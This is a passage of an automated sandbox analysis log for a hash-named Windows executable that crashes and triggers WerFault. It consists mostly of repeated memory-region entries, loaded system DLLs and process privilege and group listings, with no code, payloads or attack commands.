= 0x66dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1392 start_va = 0x660000 end_va = 0x66dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1393 start_va = 0x660000 end_va = 0x66dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1394 start_va = 0x660000 end_va = 0x66dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1395 start_va = 0x660000 end_va = 0x66dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1396 start_va = 0x660000 end_va = 0x66dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1397 start_va = 0x660000 end_va = 0x66dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1398 start_va = 0x660000 end_va = 0x66dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1399 start_va = 0x660000 end_va = 0x66dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1400 start_va = 0x660000 end_va = 0x66dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1401 start_va = 0x660000 end_va = 0x66dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1402 start_va = 0x660000 end_va = 0x66dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1403 start_va = 0x660000 end_va = 0x66dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1404 start_va = 0x660000 end_va = 0x66dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1405 start_va = 0x660000 end_va = 0x66dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1406 start_va = 0x660000 end_va = 0x66dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1407 start_va = 0x660000 end_va = 0x66dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1408 start_va = 0x660000 end_va = 0x66dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1409 start_va = 0x660000 end_va = 0x66dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1410 start_va = 0x660000 end_va = 0x66dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1411 start_va = 0x660000 end_va = 0x66dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1412 start_va = 0x660000 end_va = 0x66dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Thread: id = 29 os_tid = 0x87c Thread: id = 30 os_tid = 0xb00 Thread: id = 31 os_tid = 0x8b4 Process: id = "10" image_name = "f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe" page_root = "0x37d12000" os_pid = "0x140" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x5bc" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe\" " cur_dir = "C:\\Windows\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Process: id = "11" image_name = "werfault.exe" filename = "c:\\windows\\syswow64\\werfault.exe" page_root = "0x37ed8000" os_pid = "0xfb0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x5bc" cmd_line = "C:\\Windows\\SysWOW64\\WerFault.exe -u -p 1468 -s 1332" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1437 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1438 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1439 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1440 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1441 start_va = 0xa0000 end_va = 0xdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 1442 start_va = 0xe0000 end_va = 0xe3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 1443 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 1444 start_va = 0x100000 end_va = 0x101fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 1445 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1446 start_va = 0x8f0000 end_va = 0x932fff monitored = 0 entry_point = 0x910f50 region_type = mapped_file name = "werfault.exe" filename = "\\Windows\\SysWOW64\\WerFault.exe" (normalized: "c:\\windows\\syswow64\\werfault.exe") Region: id = 1447 start_va = 0x940000 end_va = 0x493ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000940000" filename = "" Region: id = 1448 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1449 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1450 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1451 start_va = 0x7fff0000 end_va = 0x7dfb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1452 start_va = 0x7dfb28b00000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfb28b00000" filename = "" Region: id = 1453 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1454 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Region: id = 1455 start_va = 0x5a0000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 1456 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1457 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1458 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1459 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1460 start_va = 0x400000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1461 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1462 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1463 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1464 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 1465 start_va = 0x110000 end_va = 0x1cdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1466 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1467 start_va = 0x400000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1468 start_va = 0x440000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 1469 start_va = 0x540000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1470 start_va = 0x748e0000 end_va = 0x7496cfff monitored = 0 entry_point = 0x74929b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 1471 start_va = 0x6cad0000 end_va = 0x6cb56fff monitored = 0 entry_point = 0x6cb3dbc0 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\SysWOW64\\wer.dll" (normalized: "c:\\windows\\syswow64\\wer.dll") Region: id = 1472 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1473 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1474 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1475 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1476 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1477 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1478 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 1479 start_va = 0x77820000 end_va = 0x7789afff monitored = 0 entry_point = 0x7783e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1480 start_va = 0x6c990000 end_va = 0x6cacefff monitored = 0 entry_point = 0x6c9bd880 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 1481 start_va = 0x72700000 end_va = 0x72721fff monitored = 0 entry_point = 0x727091f0 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 1482 start_va = 0x75300000 end_va = 0x75336fff monitored = 0 entry_point = 0x75303b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 1483 start_va = 0x742c0000 end_va = 0x742dafff monitored = 0 entry_point = 0x742c9050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 1484 start_va = 0x6c930000 end_va = 0x6c983fff monitored = 0 entry_point = 0x6c9610d0 region_type = mapped_file name = "faultrep.dll" filename = "\\Windows\\SysWOW64\\Faultrep.dll" (normalized: "c:\\windows\\syswow64\\faultrep.dll") Region: id = 1485 start_va = 0x70000000 end_va = 0x70020fff monitored = 0 entry_point = 0x7001a910 region_type = mapped_file name = "dbgcore.dll" filename = "\\Windows\\SysWOW64\\dbgcore.dll" (normalized: "c:\\windows\\syswow64\\dbgcore.dll") Region: id = 1486 start_va = 0x1d0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1487 start_va = 0x5b0000 end_va = 0x72ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 1488 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1489 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1490 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1491 start_va = 0x5b0000 end_va = 0x5d9fff monitored = 0 entry_point = 0x5b5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1492 start_va = 0x720000 end_va = 0x72ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 1493 start_va = 0x730000 end_va = 0x8b7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000730000" filename = "" Region: id = 1494 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1495 start_va = 0x4940000 end_va = 0x4ac0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004940000" filename = "" Region: id = 1496 start_va = 0x4ad0000 end_va = 0x5ecffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004ad0000" filename = "" Region: id = 1497 start_va = 0x1d0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 1498 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1499 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 1500 start_va = 0x580000 end_va = 0x580fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1501 start_va = 0x590000 end_va = 0x590fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 1502 start_va = 0x5b0000 end_va = 0x5fefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 1503 start_va = 0x706d0000 end_va = 0x70744fff monitored = 0 entry_point = 0x70709a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1504 start_va = 0x600000 end_va = 0x66ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 1505 start_va = 0x600000 end_va = 0x600fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 1506 start_va = 0x660000 end_va = 0x66ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 1507 start_va = 0x610000 end_va = 0x610fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 1508 start_va = 0x620000 end_va = 0x620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 1509 start_va = 0x757e0000 end_va = 0x757ebfff monitored = 0 entry_point = 0x757e3930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 1510 start_va = 0x620000 end_va = 0x620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 1511 start_va = 0x5ed0000 end_va = 0x66cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005ed0000" filename = "" Region: id = 1512 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1513 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1514 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1515 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1516 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1517 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1518 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1519 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1520 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1521 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1522 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1523 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1524 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1525 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1526 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1527 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1528 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1529 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1530 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1531 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1532 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1533 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1534 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1535 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1536 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1537 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1538 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1539 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1540 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1541 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1542 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1543 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1544 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1545 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1546 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1547 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1548 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1549 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1550 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1551 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1552 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1553 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1554 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1555 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1556 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1557 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1558 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1559 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1560 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1561 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1562 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1563 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1564 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1565 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1566 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1567 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1568 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1569 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1570 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed 